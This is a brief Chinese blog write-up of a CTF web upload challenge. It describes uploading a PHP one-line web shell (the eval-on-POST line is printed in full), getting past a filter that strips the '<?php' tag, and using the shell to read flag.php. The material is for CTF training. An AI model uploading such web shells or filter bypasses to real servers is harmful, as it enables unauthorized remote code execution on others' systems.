上传一句话木马时<? php被过滤的解决办法

时间：2019-09-15 23:21:29 阅读：1372 评论：0 收藏：0 [点我收藏+]

i春秋“百度杯”CTF比赛九月场 web题 upload

题目描述：想怎么传就怎么传，就是这么任性。tips:flag在flag.php中

打开题目发现技术分享图片

于是想到通过上传一句话木马进入后台

上传一句话木马

<?php eval($_POST[‘ant‘]);?>

提示上传成功，查看网页源代码提示技术分享图片

php文件上传到u/antsword.php中。于是直接访问发现代码变成

eval($_POST[‘ant‘]); ?>

<?php明显已经被过滤了，于是百度查找解决方法，发现有师傅提出技术分享图片

于是上传新马，成功挂马。

通过马访问flag.php 技术分享图片

得到flag 技术分享图片

参考链接https://zhidao.baidu.com/question/502391825291536924.html

原文：https://www.cnblogs.com/MisakaYuii-Z/p/11524590.html

踩

(0)

评论一句话评论（0）

分享档案

更多>